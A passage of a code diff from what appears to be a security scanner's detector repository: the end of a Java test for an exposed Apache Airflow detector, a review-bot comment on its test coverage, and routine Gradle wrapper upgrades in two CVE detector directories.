.addNetworkEndpoints(targetNetworkService.getNetworkEndpoint()) + .build(); + + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + + Truth.assertThat(mockCallbackServer.getRequestCount()).isEqualTo(1); + Truth.assertThat(mockTargetService.getRequestCount()).isEqualTo(3); + assertThat(detectionReports.getDetectionReportsList()) + .comparingExpectedFieldsOnly() + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(targetNetworkService) + .setDetectionTimestamp( + 
Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("APACHE_AIRFLOW_SERVER_EXPOSED")) + .setSeverity(Severity.HIGH) + .setTitle("Exposed Apache Airflow Server") + .setDescription( + "Apache Airflow Server is misconfigured and can be accessed publicly," + + " We confirmed this by checking API endpoint and matching the" + + " responses with our pattern") + .setRecommendation( + "Please disable public access to your apache airflow instance.")) + .build()); + } + + private void startMockWebServer() throws IOException { + final Dispatcher dispatcher = + new Dispatcher() { + + @Override + public MockResponse dispatch(RecordedRequest request) { + switch (request.getPath()) { + case "/login": + return new MockResponse() + .setResponseCode(200) + .setBody( + "\n" + + "\n" + + " \n" + + " Sign In - Airflow\n" + + " \n" + + "" + + " " + + "Airflow Website" + + ""); + case "/api/v1/dags": + return new MockResponse() + .setResponseCode(200) + .setBody( + "{\"dags\": [{\"next_dagrun_create_after\":" + + " \"2019-08-24T14:15:22Z\"}],\"total_entries\": 0}"); + case "/api/v1/connections/test": + return new MockResponse().setResponseCode(200); + default: + return new MockResponse().setResponseCode(400); + } + } + }; + mockTargetService.setDispatcher(dispatcher); + mockTargetService.start(); + mockTargetService.url("/"); + } +} 
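Review bot: `detect_withCallbackServer_butNoCallback_returnsEmpty` never reaches the callback check: all three queued target responses are 400, so `isApacheAirflow` fails on `/login` and the service is filtered out, which makes this test equivalent to `detect_no_airflow_webservice_returnsEmpty`. The case that matters for false positives, a fingerprinted Airflow whose `/api/v1/connections/test` and `/api/v1/dags` both reject the unauthenticated request, is not covered by any test in this file. Serve the `/login` page from the dispatcher, return an error status for the two API paths, and assert that both probes actually ran, e.g. `Truth.assertThat(mockTargetService.getRequestCount()).isEqualTo(3);`, next to the existing `isEmpty()` assertion.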
diff --git a/community/detectors/apache_druid_preauth_rce_cve_2021_25646/gradle/wrapper/gradle-wrapper.jar b/community/detectors/apache_druid_preauth_rce_cve_2021_25646/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/apache_druid_preauth_rce_cve_2021_25646/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/apache_druid_preauth_rce_cve_2021_25646/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/apache_druid_preauth_rce_cve_2021_25646/gradle/wrapper/gradle-wrapper.properties b/community/detectors/apache_druid_preauth_rce_cve_2021_25646/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/apache_druid_preauth_rce_cve_2021_25646/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/apache_druid_preauth_rce_cve_2021_25646/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/community/detectors/apache_druid_preauth_rce_cve_2021_25646/gradlew b/community/detectors/apache_druid_preauth_rce_cve_2021_25646/gradlew index fbd7c5158..1aa94a426 100755 --- a/community/detectors/apache_druid_preauth_rce_cve_2021_25646/gradlew +++ b/community/detectors/apache_druid_preauth_rce_cve_2021_25646/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/apache_druid_preauth_rce_cve_2021_25646/gradlew.bat b/community/detectors/apache_druid_preauth_rce_cve_2021_25646/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/apache_druid_preauth_rce_cve_2021_25646/gradlew.bat +++ b/community/detectors/apache_druid_preauth_rce_cve_2021_25646/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/community/detectors/apache_http_server_cve_2021_41773/gradle/wrapper/gradle-wrapper.jar b/community/detectors/apache_http_server_cve_2021_41773/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/apache_http_server_cve_2021_41773/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/apache_http_server_cve_2021_41773/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/apache_http_server_cve_2021_41773/gradle/wrapper/gradle-wrapper.properties b/community/detectors/apache_http_server_cve_2021_41773/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/apache_http_server_cve_2021_41773/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/apache_http_server_cve_2021_41773/gradle/wrapper/gradle-wrapper.properties 
@@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/community/detectors/apache_http_server_cve_2021_41773/gradlew b/community/detectors/apache_http_server_cve_2021_41773/gradlew index fbd7c5158..1aa94a426 100755 --- a/community/detectors/apache_http_server_cve_2021_41773/gradlew +++ b/community/detectors/apache_http_server_cve_2021_41773/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline 